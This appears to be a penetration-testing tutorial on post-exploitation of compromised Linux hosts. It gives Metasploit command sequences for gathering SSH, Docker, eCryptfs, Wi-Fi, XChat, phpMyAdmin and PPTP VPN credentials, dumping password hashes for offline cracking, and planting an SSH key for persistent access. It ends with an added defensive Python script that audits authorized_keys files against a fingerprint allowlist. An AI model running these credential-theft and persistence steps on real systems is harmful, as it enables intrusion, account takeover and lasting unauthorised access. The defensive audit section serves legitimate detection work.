Credential gathering and persistence

1. Credential Gathering

Once a system is compromised, gathering credentials is crucial for lateral movement and further exploitation.

Extracting SSH Credentials

use post/multi/gather/ssh_creds
set SESSION 1
run

This module extracts stored SSH credentials, which can be used to access other machines in the network.

Extracting Docker Credentials

use post/multi/gather/docker_creds
set SESSION 1
run

This command retrieves Docker authentication credentials, which may provide access to containerized applications and services.

Dumping Linux Password Hashes

use post/linux/gather/hashdump
set SESSION 1
set VERBOSE true
run

Hash dumping allows attackers to obtain user password hashes, which can be cracked offline using tools like Hashcat or John the Ripper.

Retrieving eCryptfs Credentials

use post/linux/gather/ecryptfs_creds
set SESSION 1
run

If the target system uses eCryptfs for encrypted directories, this module extracts the necessary keys.

Enumerating Wireless Pre-Shared Keys

use post/linux/gather/enum_psk
set SESSION 1
run

This module lists stored Wi-Fi passwords, which can be useful for network pivoting.

Extracting XChat Credentials

use post/linux/gather/enum_xchat
set SESSION 1
set XCHAT true
run

Attackers can use this module to extract credentials and chat logs from XChat, an IRC client.

Stealing phpMyAdmin Credentials

use post/linux/gather/phpmyadmin_credsteal
set SESSION 1
run

Many administrators use phpMyAdmin to manage databases. This module extracts stored credentials, allowing access to sensitive data.

Retrieving PPTP VPN Secrets

use post/linux/gather/pptpd_chap_secrets
set SESSION 1
run

This module collects credentials stored in the chap-secrets file, potentially giving an attacker access to VPN connections.
2. Persistence

Maintaining access to a compromised system ensures an attacker can return even after a reboot or security patch.

SSH Key Persistence

use post/linux/manage/sshkey_persistence
set SESSION 1
set CREATESSHFOLDER true
run

This module installs an SSH key for persistent access, ensuring the attacker can log in even if passwords are changed.
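The defender-side check for this technique, added here and not part of the original page or of the Metasploit module: audit an authorized_keys file against an allowlist of SHA256 key fingerprints, so any key that was appended (by this module or anything else) shows up as a finding. The key blobs, account names and the sample file are constructed dummies, and the fingerprint format follows OpenSSH's `SHA256:` convention.

```python
"""Audit authorized_keys content against an allowlist of key fingerprints."""
import base64
import hashlib
import re

# Key types OpenSSH accepts in authorized_keys; anything else is unparseable.
KEY_TYPES = ("ssh-ed25519", "ssh-rsa", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521", "ssh-dss")
# Optional options field, key type, base64 blob, optional comment.
_LINE_RE = re.compile(
    r"^(?:(?P<opts>.*?)\s+)?(?P<type>" + "|".join(map(re.escape, KEY_TYPES)) +
    r")\s+(?P<blob>[A-Za-z0-9+/]+={0,2})(?:\s+(?P<comment>.*))?$")


def fingerprint(blob_b64):
    """OpenSSH-style fingerprint: SHA256 of the raw key blob, base64, no padding."""
    digest = hashlib.sha256(base64.b64decode(blob_b64, validate=True)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text):
    """Return one dict per key line; malformed lines are reported, not skipped."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = _LINE_RE.match(line)
        try:
            fp = fingerprint(m["blob"]) if m else None
        except ValueError:  # binascii.Error is a ValueError: bad base64
            m = None
        if not m:
            entries.append({"line": lineno, "error": "unparseable"})
            continue
        entries.append({"line": lineno, "type": m["type"], "fingerprint": fp,
                        "options": m["opts"] or "", "comment": m["comment"] or ""})
    return entries


def audit(text, allowlist):
    """Findings: keys whose fingerprint is not allowlisted, plus parse errors."""
    return [e for e in parse_authorized_keys(text)
            if "error" in e or e["fingerprint"] not in allowlist]


ED25519_PREFIX = "AAAAC3NzaC1lZDI1NTE5AAAAI"  # length-prefixed "ssh-ed25519" + key length
ADMIN_BLOB = ED25519_PREFIX + "A" * 43       # constructed dummy key material, not a real key
ROGUE_BLOB = ED25519_PREFIX + "B" * 43       # constructed dummy, stands in for an appended key
SAMPLE = ("# constructed sample authorized_keys\n"
          f"ssh-ed25519 {ADMIN_BLOB} admin@bastion\n"
          f'from="10.0.0.5",no-pty ssh-ed25519 {ROGUE_BLOB} unknown@host\n'
          "ssh-rsa not-base64!\n")
ALLOWLIST = {fingerprint(ADMIN_BLOB)}  # fingerprints of keys that are supposed to be there

if __name__ == "__main__":
    for finding in audit(SAMPLE, ALLOWLIST):
        print(finding)
```

Run the same audit on every `authorized_keys` under `/home/*/.ssh` and `/root/.ssh` from a known-good baseline, and treat a newly created `.ssh` directory for an account that never had one as a finding in its own right.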
